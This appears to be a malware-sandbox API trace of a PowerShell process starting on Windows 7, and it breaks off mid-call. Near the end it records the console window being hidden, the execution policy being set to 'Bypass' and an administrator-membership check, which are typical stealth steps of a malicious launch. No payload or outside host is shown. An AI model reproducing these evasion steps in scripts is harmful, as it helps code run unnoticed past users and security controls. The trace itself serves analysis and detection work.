	[0152.252] lstrcpyW (in: lpString1=0x367ed0, lpString2="Copyright (c) Microsoft Corporation. All rights reserved." | out: lpString1="Copyright (c) Microsoft Corporation. All rights reserved.") returned="Copyright (c) Microsoft Corporation. All rights reserved."
	[0152.252] CoTaskMemFree (pv=0x367ed0) 
	[0152.252] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x2eca444, puLen=0x12ddc0) returned 1
	[0152.252] lstrlenW (lpString="System.Management.Automation.dll") returned 32
	[0152.252] CoTaskMemAlloc (cb=0x44) returned 0x3dbe70
	[0152.252] lstrcpyW (in: lpString1=0x3dbe70, lpString2="System.Management.Automation.dll" | out: lpString1="System.Management.Automation.dll") returned="System.Management.Automation.dll"
	[0152.252] CoTaskMemFree (pv=0x3dbe70) 
	[0152.252] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x2eca4a8, puLen=0x12ddc0) returned 1
	[0152.252] lstrlenW (lpString="Microsoft (R) Windows (R) Operating System") returned 42
	[0152.252] CoTaskMemAlloc (cb=0x58) returned 0x3220b0
	[0152.252] lstrcpyW (in: lpString1=0x3220b0, lpString2="Microsoft (R) Windows (R) Operating System" | out: lpString1="Microsoft (R) Windows (R) Operating System") returned="Microsoft (R) Windows (R) Operating System"
	[0152.252] CoTaskMemFree (pv=0x3220b0) 
	[0152.252] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x2eca524, puLen=0x12ddc0) returned 1
	[0152.252] lstrlenW (lpString="6.1.7601.17514") returned 14
	[0152.252] CoTaskMemAlloc (cb=0x20) returned 0x3d8780
	[0152.252] lstrcpyW (in: lpString1=0x3d8780, lpString2="6.1.7601.17514" | out: lpString1="6.1.7601.17514") returned="6.1.7601.17514"
	[0152.252] CoTaskMemFree (pv=0x3d8780) 
	[0152.252] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\Comments", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x2eca1cc, puLen=0x12ddc0) returned 1
	[0152.252] lstrlenW (lpString="Microsoft Windows PowerShell Engine Core Assembly") returned 49
	[0152.252] CoTaskMemAlloc (cb=0x66) returned 0x3d7000
	[0152.252] lstrcpyW (in: lpString1=0x3d7000, lpString2="Microsoft Windows PowerShell Engine Core Assembly" | out: lpString1="Microsoft Windows PowerShell Engine Core Assembly") returned="Microsoft Windows PowerShell Engine Core Assembly"
	[0152.252] CoTaskMemFree (pv=0x3d7000) 
	[0152.252] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalTrademarks", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x0, puLen=0x12ddc0) returned 0
	[0152.252] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\PrivateBuild", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x0, puLen=0x12ddc0) returned 0
	[0152.252] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\SpecialBuild", lplpBuffer=0x12ddc8, puLen=0x12ddc0 | out: lplpBuffer=0x12ddc8*=0x0, puLen=0x12ddc0) returned 0
	[0152.252] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x12dd98, puLen=0x12dd90 | out: lplpBuffer=0x12dd98*=0x2eca174, puLen=0x12dd90) returned 1
	[0152.253] CoTaskMemAlloc (cb=0x204) returned 0x3631c0
	[0152.253] VerLanguageNameW (in: wLang=0x0, szLang=0x3631c0, cchLang=0x100 | out: szLang="Language Neutral") returned 0x10
	[0152.253] CoTaskMemFree (pv=0x3631c0) 
	[0152.253] VerQueryValueW (in: pBlock=0x2eca0d8, lpSubBlock="\\", lplpBuffer=0x12dde8, puLen=0x12dde0 | out: lplpBuffer=0x12dde8*=0x2eca100, puLen=0x12dde0) returned 1
	[0152.260] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0152.260] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.261] CoTaskMemFree (pv=0x3839f0) 
	[0152.264] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0152.264] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.264] CoTaskMemFree (pv=0x3839f0) 
	[0152.268] lstrlenW (lpString="䅁") returned 1
	[0152.347] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dcb8 | out: phkResult=0x12dcb8*=0x304) returned 0x0
	[0152.348] RegOpenKeyExW (in: hKey=0x304, lpSubKey="1", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dca8 | out: phkResult=0x12dca8*=0x308) returned 0x0
	[0152.348] RegOpenKeyExW (in: hKey=0x308, lpSubKey="PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x12dd38 | out: phkResult=0x12dd38*=0x30c) returned 0x0
	[0152.352] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dc7c, lpData=0x0, lpcbData=0x12dc78*=0x0 | out: lpType=0x12dc7c*=0x1, lpData=0x0, lpcbData=0x12dc78*=0x56) returned 0x0
	[0152.353] CoTaskMemAlloc (cb=0x5a) returned 0x3d6f90
	[0152.353] RegQueryValueExW (in: hKey=0x30c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x12dc4c, lpData=0x3d6f90, lpcbData=0x12dc48*=0x56 | out: lpType=0x12dc4c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x12dc48*=0x56) returned 0x0
	[0152.353] CoTaskMemFree (pv=0x3d6f90) 
	[0152.358] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0152.360] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0152.365] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d7d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0152.380] CoTaskMemAlloc (cb=0x104) returned 0x3839f0
	[0152.380] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x3839f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.380] CoTaskMemFree (pv=0x3839f0) 
	[0152.531] CoTaskMemAlloc (cb=0x104) returned 0x383b00
	[0152.531] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.531] CoTaskMemFree (pv=0x383b00) 
	[0152.532] CoTaskMemAlloc (cb=0x104) returned 0x383b00
	[0152.532] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.532] CoTaskMemFree (pv=0x383b00) 
	[0152.559] CoTaskMemAlloc (cb=0x104) returned 0x383b00
	[0152.559] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.559] CoTaskMemFree (pv=0x383b00) 
	[0152.560] CoTaskMemAlloc (cb=0x104) returned 0x383b00
	[0152.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.560] CoTaskMemFree (pv=0x383b00) 
	[0152.560] CoTaskMemAlloc (cb=0x104) returned 0x383b00
	[0152.560] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.560] CoTaskMemFree (pv=0x383b00) 
	[0152.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0152.724] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x12d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0152.755] CoTaskMemAlloc (cb=0x104) returned 0x383b00
	[0152.755] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0152.755] CoTaskMemFree (pv=0x383b00) 
	[0153.008] CoTaskMemAlloc (cb=0x104) returned 0x383b00
	[0153.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383b00, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.008] CoTaskMemFree (pv=0x383b00) 
	[0153.120] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.121] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.121] CoTaskMemFree (pv=0x383d20) 
	[0153.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.123] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.124] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.130] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.203] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", nBufferLength=0x105, lpBuffer=0x12d990, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config", lpFilePart=0x0) returned 0x3c
	[0153.203] SetErrorMode (uMode=0x1) returned 0x1
	[0153.203] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.config" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.config"), fInfoLevelId=0x0, lpFileInformation=0x12dc10 | out: lpFileInformation=0x12dc10*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0153.203] SetErrorMode (uMode=0x1) returned 0x1
	[0153.287] bsearch (_Key=0x12b1f0, _Base=0x642ff4a1d90, _NumOfElements=0xcc, _SizeOfElements=0x18, _PtFuncCompare=0x642ff4a337c) returned 0x642ff4a2498
	[0153.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12da70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.305] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d9c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.307] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.307] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.307] CoTaskMemFree (pv=0x383d20) 
	[0153.310] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.310] CoTaskMemFree (pv=0x383d20) 
	[0153.310] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.310] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.310] CoTaskMemFree (pv=0x383d20) 
	[0153.313] CoCreateGuid (in: pguid=0x12dfd8 | out: pguid=0x12dfd8*(Data1=0x2dce8119, Data2=0xf6c5, Data3=0x4dfd, Data4=([0]=0x89, [1]=0xb4, [2]=0x73, [3]=0xc3, [4]=0x7b, [5]=0x76, [6]=0xf6, [7]=0x52))) returned 0x0
	[0153.315] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.315] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.315] CoTaskMemFree (pv=0x383d20) 
	[0153.322] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.323] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.323] CoTaskMemFree (pv=0x383d20) 
	[0153.325] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.325] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.325] CoTaskMemFree (pv=0x383d20) 
	[0153.330] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0153.332] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0x12dc80 | out: lpConsoleScreenBufferInfo=0x12dc80) returned 1
	[0153.336] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0153.337] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0x12dc80 | out: lpConsoleScreenBufferInfo=0x12dc80) returned 1
	[0153.338] GetVersionExW (in: lpVersionInformation=0x12dc10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x12dc10*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0153.340] GetCurrentProcess () returned 0xffffffffffffffff
	[0153.340] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x12dca8 | out: TokenHandle=0x12dca8*=0x320) returned 1
	[0153.344] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12dbc8 | out: TokenInformation=0x0, ReturnLength=0x12dbc8) returned 0
	[0153.345] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3338b0
	[0153.345] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x3338b0, TokenInformationLength=0x4, ReturnLength=0x12dbc8 | out: TokenInformation=0x3338b0, ReturnLength=0x12dbc8) returned 1
	[0153.346] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0x12dd28 | out: phNewToken=0x12dd28*=0x31c) returned 1
	[0153.346] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x12dbc8 | out: TokenInformation=0x0, ReturnLength=0x12dbc8) returned 0
	[0153.346] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3338e0
	[0153.346] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x3338e0, TokenInformationLength=0x4, ReturnLength=0x12dbc8 | out: TokenInformation=0x3338e0, ReturnLength=0x12dbc8) returned 1
	[0153.347] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2fa4e80*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0x12dd38 | out: IsMember=0x12dd38) returned 1
	[0153.347] CloseHandle (hObject=0x31c) returned 1
	[0153.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d800, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.348] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d850, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.378] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0153.401] SetConsoleCtrlHandler (HandlerRoutine=0x2d8677c, Add=1) returned 1
	[0153.409] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.409] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.409] CoTaskMemFree (pv=0x383d20) 
	[0153.410] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.410] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.410] CoTaskMemFree (pv=0x383d20) 
	[0153.574] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.574] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.574] CoTaskMemFree (pv=0x383d20) 
	[0153.624] GetConsoleWindow () returned 0x90262
	[0153.625] ShowWindow (hWnd=0x90262, nCmdShow=0) returned 0
	[0153.628] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.628] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.628] CoTaskMemFree (pv=0x383d20) 
	[0153.638] SetEnvironmentVariableW (lpName="PSExecutionPolicyPreference", lpValue="Bypass") returned 1
	[0153.692] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0153.695] CoCreateGuid (in: pguid=0x12de20 | out: pguid=0x12de20*(Data1=0x322637da, Data2=0x27c4, Data3=0x4f32, Data4=([0]=0x85, [1]=0x90, [2]=0xb2, [3]=0x6d, [4]=0xb3, [5]=0xfc, [6]=0x29, [7]=0xb9))) returned 0x0
	[0153.697] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.697] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.697] CoTaskMemFree (pv=0x383d20) 
	[0153.721] WinSqmIsOptedIn () returned 0x0
	[0153.734] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.734] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.735] CoTaskMemFree (pv=0x383d20) 
	[0153.743] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.743] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.743] CoTaskMemFree (pv=0x383d20) 
	[0153.748] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.748] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.748] CoTaskMemFree (pv=0x383d20) 
	[0153.751] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.751] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.751] CoTaskMemFree (pv=0x383d20) 
	[0153.757] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.757] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.757] CoTaskMemFree (pv=0x383d20) 
	[0153.760] CoTaskMemAlloc (cb=0x104) returned 0x383d20
	[0153.760] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x383d20, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0153.760] CoTaskMemFree (pv=0x383d20) 
	[0153.762] CoTaskMemAlloc (cb=0x104) returned 0x383d20
